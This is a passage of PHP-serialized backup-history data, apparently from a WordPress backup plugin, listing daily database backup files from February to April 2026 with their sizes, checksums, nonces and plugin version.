12:\"is_multisite\";b:0;}i:1775178791;a:11:{s:2:\"db\";s:47:\"backup_2026-04-03-0113_AMB18_0adb1af3a0b9-db.gz\";s:7:\"db-size\";i:2023009;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3c6ca05745a7e9e5f206a10b3e7077d33d3792f3\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"cb842dac55c34b6f7ac48cd82753138f91dc6b32551a0858899ad966a59ecd3c\";}}s:5:\"nonce\";s:12:\"0adb1af3a0b9\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775092344;a:11:{s:2:\"db\";s:47:\"backup_2026-04-02-0112_AMB18_da4d5041d11e-db.gz\";s:7:\"db-size\";i:2021646;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"16658c829335985629c857afff4ddd8e79fd10ac\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"8db391ac1e1db6ef810880d8f8f635e8c69ca87ed44b9732d7cacac48151b5e3\";}}s:5:\"nonce\";s:12:\"da4d5041d11e\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775005868;a:11:{s:2:\"db\";s:47:\"backup_2026-04-01-0111_AMB18_86de984007ca-db.gz\";s:7:\"db-size\";i:2041035;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"ea739433d82ba83939ae75fa7a223e7ef59ba2c2\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"71f055a4fe31986d4c43e1f1f4451bf115dab483433dfcaddde9ed7f571dfec9\";}}s:5:\"nonce\";s:12:\"86de984007ca\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774919549;a:11:{s:2:\"db\";s:47:\"backup_2026-03-31-0112_AMB18_370a66ac6625-db.gz\";s:7:\"db-size\";i:2040830;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3c4fc485c531a81c0b94442992f5f39cf3914716\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e28adbb73064b959fa685fba8035d7c22653add38eed77b5a83962cabff7c7a6\";}}s:5:\"nonce\";s:12:\"370a66ac6625\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774833315;a:11:{s:2:\"db\";s:47:\"backup_2026-03-30-0115_AMB18_c4cf9b5ae7ba-db.gz\";s:7:\"db-size\";i:2039729;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"6cf25d4ded14e5b2eca4268284e8e4fa10d712f2\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"35d3f264af8364a398ae410c0311bb7dda8fd681f30066ea3eaa7044abd07e2b\";}}s:5:\"nonce\";s:12:\"c4cf9b5ae7ba\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774746746;a:11:{s:2:\"db\";s:47:\"backup_2026-03-29-0112_AMB18_d79fb3e00e04-db.gz\";s:7:\"db-size\";i:2039850;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"21fadb9b1ae1ead5e744dab538e1a25622f2b08d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"4fe2900ffe2dacb6dd10ef965ce52b25d9b759a3409fc6d30783a7b4734be800\";}}s:5:\"nonce\";s:12:\"d79fb3e00e04\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774660616;a:11:{s:2:\"db\";s:47:\"backup_2026-03-28-0116_AMB18_eecf0392143f-db.gz\";s:7:\"db-size\";i:2039526;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"a979e32763233f9f00ae24242620f645f71ea0a3\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"dfae53490b89cff3d74211e31b022a701425f266d236bf0e32f28cc6695869b8\";}}s:5:\"nonce\";s:12:\"eecf0392143f\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774573919;a:11:{s:2:\"db\";s:47:\"backup_2026-03-27-0111_AMB18_136e45f23b8e-db.gz\";s:7:\"db-size\";i:2040788;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"14daad469fc8095eb89b07bbc3b3a988afb4569c\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"33307f5a642026b18d930bdb763dc93c6bfa845d6e2023eecda2d625ccb4451a\";}}s:5:\"nonce\";s:12:\"136e45f23b8e\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774487470;a:11:{s:2:\"db\";s:47:\"backup_2026-03-26-0111_AMB18_c603f7c3ab80-db.gz\";s:7:\"db-size\";i:2123645;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"76c6ae197ccf0cbfcbe92793906a25c8e0142410\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"59dc7854976ba4e56b89f3eeaf0cd4da3092c4b958523543435b7b34c5462992\";}}s:5:\"nonce\";s:12:\"c603f7c3ab80\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774404263;a:11:{s:2:\"db\";s:47:\"backup_2026-03-25-0204_AMB18_9be57af036a5-db.gz\";s:7:\"db-size\";i:2123404;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c356c6c99822eb292d8be445a828051b697f3e3a\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e0a2b9784839ab7c718911ec88c60bba9cbeb5ff7850ae98971e61dbc4a97696\";}}s:5:\"nonce\";s:12:\"9be57af036a5\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774314668;a:11:{s:2:\"db\";s:47:\"backup_2026-03-24-0111_AMB18_265e628af456-db.gz\";s:7:\"db-size\";i:2122543;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"8e4b68d1b26643572645d8a6ff719cbe1128ab39\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"879e03fee1f704a0783eb67f05f2d2cb8a7172fd745209d872750f1c88866b7f\";}}s:5:\"nonce\";s:12:\"265e628af456\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774228263;a:11:{s:2:\"db\";s:47:\"backup_2026-03-23-0111_AMB18_76470870bd35-db.gz\";s:7:\"db-size\";i:2121240;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"4a5dfcd873fbfe9341164e8f01ad20b06ea41895\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"be555ca9df0feb047686b5d2cbbb8ae807068a28d0973b57190306609b34a035\";}}s:5:\"nonce\";s:12:\"76470870bd35\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774142660;a:11:{s:2:\"db\";s:47:\"backup_2026-03-22-0124_AMB18_f7f12947b40f-db.gz\";s:7:\"db-size\";i:2120774;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"697bf49032d5608228ba44e6a81aafc73083298b\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"15108bf0e1ab679e420f2242d19be3cebbc5c0be054f835f262313e2ec31abfb\";}}s:5:\"nonce\";s:12:\"f7f12947b40f\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1774056458;a:11:{s:2:\"db\";s:47:\"backup_2026-03-21-0127_AMB18_b204037b1c7d-db.gz\";s:7:\"db-size\";i:2120574;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"b44664458f49f796d086089adcf384ca798ca697\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e75b584e0adbf290b6652d5bc0ae89f1066b643d573e06ac9ae6dbd508c5865a\";}}s:5:\"nonce\";s:12:\"b204037b1c7d\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773969051;a:11:{s:2:\"db\";s:47:\"backup_2026-03-20-0110_AMB18_38013b123a53-db.gz\";s:7:\"db-size\";i:2120153;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"0d07254a0e80440aba1de62614a289ddcb4e6acb\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"2994fcae14cf44de960ab79ab054749ffb3833ba6f213bd3ac893c972708ec57\";}}s:5:\"nonce\";s:12:\"38013b123a53\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773882666;a:11:{s:2:\"db\";s:47:\"backup_2026-03-19-0111_AMB18_db39e18203e5-db.gz\";s:7:\"db-size\";i:2118154;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"eff968e0c562271dc3fe2bc6f8da846f66567aa9\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"b52c91cbedeb54f50890635e3448e353ec41f9fc8fecbad0550878dd96a393b2\";}}s:5:\"nonce\";s:12:\"db39e18203e5\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773796262;a:11:{s:2:\"db\";s:47:\"backup_2026-03-18-0111_AMB18_b5680a985030-db.gz\";s:7:\"db-size\";i:2117855;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"9b05d0dd1d83ee9b10dd5eadd943f6960a131062\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"f5fc473387e95fedf13033dd107c69bb77f52df935db2419f1e991fcf557bdff\";}}s:5:\"nonce\";s:12:\"b5680a985030\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773712272;a:11:{s:2:\"db\";s:47:\"backup_2026-03-17-0151_AMB18_c794bd997d6d-db.gz\";s:7:\"db-size\";i:2117361;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c090d6f9336c0cd92d080f20ff2457cef7481f88\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"df1dd775f73984b38b31cd40bff8120b1d59c7e8c8a34e00e68ee12359dd13fb\";}}s:5:\"nonce\";s:12:\"c794bd997d6d\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773623630;a:11:{s:2:\"db\";s:47:\"backup_2026-03-16-0113_AMB18_2d26440e8e00-db.gz\";s:7:\"db-size\";i:2115849;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"980df9739b2bf8dda2be43d1db71786b512b79f6\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"4b7866c73f691d265700e5f25f24c23c194f8cfe914b9f7f2c606e9060f03c3f\";}}s:5:\"nonce\";s:12:\"2d26440e8e00\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773537059;a:11:{s:2:\"db\";s:47:\"backup_2026-03-15-0110_AMB18_5e6214e74ac9-db.gz\";s:7:\"db-size\";i:2115257;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"57c52a5ca1133cb0528318ba2c399ca85e8e92d3\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"33450e6e271fa41935eeb2ce2e277ddd00c14ce11bc526e8b7b966d9ec8f7d62\";}}s:5:\"nonce\";s:12:\"5e6214e74ac9\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773450855;a:11:{s:2:\"db\";s:47:\"backup_2026-03-14-0114_AMB18_c47f3fa4f039-db.gz\";s:7:\"db-size\";i:2114661;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"0ae1dbbdd3d557b068a5efaf97053fe34e6e71fc\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"27839e077ab91bf2a1e24a273d0f5a54922e9fead2927940128ce1b7493f5488\";}}s:5:\"nonce\";s:12:\"c47f3fa4f039\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773365975;a:11:{s:2:\"db\";s:47:\"backup_2026-03-13-0139_AMB18_5317985fa0f5-db.gz\";s:7:\"db-size\";i:2113792;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"28d7428816a4e4945b29f530c9539de2a9a8a472\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"5aa173f5439a8d1ab9a6d4cebbfca763f1668527a53dd0ed1ba3d4aa2f6b6b2a\";}}s:5:\"nonce\";s:12:\"5317985fa0f5\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773278453;a:11:{s:2:\"db\";s:47:\"backup_2026-03-12-0120_AMB18_08494bfaed2c-db.gz\";s:7:\"db-size\";i:2108669;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"22b4abadd400e5a540446fbcb8e6abc7e8bf0f27\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"22f18871aa1d47da94b86e6469140783102bb5afd9012725443bad8661b30c35\";}}s:5:\"nonce\";s:12:\"08494bfaed2c\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773191869;a:11:{s:2:\"db\";s:47:\"backup_2026-03-11-0117_AMB18_bc3d804b234e-db.gz\";s:7:\"db-size\";i:2108286;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3a27eaeb528c9d7dd982b7b8dbeb63cd32da3980\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"50fea0ea7f8735c549fdcf375f377ad22f9c3651d20bb3aead598c7019a02a08\";}}s:5:\"nonce\";s:12:\"bc3d804b234e\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773107477;a:11:{s:2:\"db\";s:47:\"backup_2026-03-10-0151_AMB18_8444d5369c8f-db.gz\";s:7:\"db-size\";i:2107453;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3f1beab2bf7278395b0f5eb40d62f9dc5bc63b88\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"edc8fa2ac078e75ee82d4f10920718f7280176e53f96d918e514e17d8976c81c\";}}s:5:\"nonce\";s:12:\"8444d5369c8f\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1773019755;a:11:{s:2:\"db\";s:47:\"backup_2026-03-09-0129_AMB18_fb21295aab09-db.gz\";s:7:\"db-size\";i:2106782;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"44d9ff3172236932a4015dceacf9534f3ec8c29f\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"419a41e2a246376b47028eaab3e3f404ffaf4860cc590663851f3fc9f61f70cc\";}}s:5:\"nonce\";s:12:\"fb21295aab09\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772932660;a:11:{s:2:\"db\";s:47:\"backup_2026-03-08-0117_AMB18_4c0e35c8d294-db.gz\";s:7:\"db-size\";i:2105024;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"83209f4c7c4a0bab2b691fcdfc8d8c5ea5c47fc5\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"09c6f7260d27a7868b301047a62a52fd4ed7ca6a6641b919265525d33fdb6459\";}}s:5:\"nonce\";s:12:\"4c0e35c8d294\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772846447;a:11:{s:2:\"db\";s:47:\"backup_2026-03-07-0120_AMB18_b4a1b7ed765c-db.gz\";s:7:\"db-size\";i:2104648;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"82c26709dc6667fce517fe103ad031e78e91a5ee\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"7889535dc7e5f7a01f25577e7d37f9f36653846e7f030bfd17c91493ddb6832e\";}}s:5:\"nonce\";s:12:\"b4a1b7ed765c\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772761778;a:11:{s:2:\"db\";s:47:\"backup_2026-03-06-0149_AMB18_8f1343dde1b9-db.gz\";s:7:\"db-size\";i:2103986;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"96a27b01d268896ac8c348306f2029b39009cb08\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"aca1984ce03eee579ca32f86a4c9d6d8c22d28264f7c7d56f984e56d970fa453\";}}s:5:\"nonce\";s:12:\"8f1343dde1b9\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772673572;a:11:{s:2:\"db\";s:47:\"backup_2026-03-05-0119_AMB18_d9db5d2a09da-db.gz\";s:7:\"db-size\";i:2103189;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"ba589618f7139827932536dc3b01c5de7e2d5c36\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c37f37ff9373b93071fc13f7bb95052e295b2159f143578f79ee2fc63e162775\";}}s:5:\"nonce\";s:12:\"d9db5d2a09da\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772587206;a:11:{s:2:\"db\";s:47:\"backup_2026-03-04-0120_AMB18_b2cb46c726b4-db.gz\";s:7:\"db-size\";i:2098831;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3fba410e1256f12385cdcea68697f021d9419b7b\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"657ba377f5d6c99d87826b160d209e1f16c4e23685bd2b25750dea0d135574f8\";}}s:5:\"nonce\";s:12:\"b2cb46c726b4\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772500277;a:11:{s:2:\"db\";s:47:\"backup_2026-03-03-0111_AMB18_fffaf83741e8-db.gz\";s:7:\"db-size\";i:2323620;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"1a9b3f03e079069e04b0a17160d4c17c6ba05ca2\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"1cc4f81d5ce6a008b0c6acf657ef69099f425e9d753c8c8f5bc51f977e53c044\";}}s:5:\"nonce\";s:12:\"fffaf83741e8\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772413985;a:11:{s:2:\"db\";s:47:\"backup_2026-03-02-0113_AMB18_0bb404af30c7-db.gz\";s:7:\"db-size\";i:2031641;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"d548b9b2bda35bb5c660e94fc9eb23dd945527b5\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"9d2fa3735d912ff23cec74eff65b4d85a049b7659d243ea6803c6c9af8e7efb3\";}}s:5:\"nonce\";s:12:\"0bb404af30c7\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772327597;a:11:{s:2:\"db\";s:47:\"backup_2026-03-01-0113_AMB18_f32b8f246bda-db.gz\";s:7:\"db-size\";i:2024953;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"7a4f4c35da7598d695204a2f06ee9fb03a57d220\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"1856785b4886c629500c215d96d7a88b16b20bf75aa520e51046d2f1c0858604\";}}s:5:\"nonce\";s:12:\"f32b8f246bda\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772241072;a:11:{s:2:\"db\";s:47:\"backup_2026-02-28-0111_AMB18_2428f2d7d232-db.gz\";s:7:\"db-size\";i:2020974;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"9d11ab72e63f3ea3df3f76c6d0cfe6ab3f7c0699\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"cdcaaf253b5ef1e34bbae63aec68bc586f4a7ea0190ba90aabef488bc8f3b31d\";}}s:5:\"nonce\";s:12:\"2428f2d7d232\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772154752;a:11:{s:2:\"db\";s:47:\"backup_2026-02-27-0112_AMB18_690ff8767139-db.gz\";s:7:\"db-size\";i:2256573;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3fbabdae1a31832339291f5d390433ad28231dde\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"1bc2727622ac1b68a8a5f0a9dc7082d4ca73eec592f8461ab8b56e52ed47d9de\";}}s:5:\"nonce\";s:12:\"690ff8767139\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1772068250;a:11:{s:2:\"db\";s:48:\"backup_2026-02-26-0110_YOK789_dedef95852f2-db.gz\";s:7:\"db-size\";i:2008196;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"9e86183456400968efb654e95d162c5e8f6e298d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"10648454cb66dd092e737ca0e78aeb2cebaef669bbfd1dfb305fa5229008e32e\";}}s:5:\"nonce\";s:12:\"dedef95852f2\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1771982755;a:11:{s:2:\"db\";s:48:\"backup_2026-02-25-0125_YOK789_573ad53c5414-db.gz\";s:7:\"db-size\";i:2192424;s:9:\"checksums\";a:2:{s: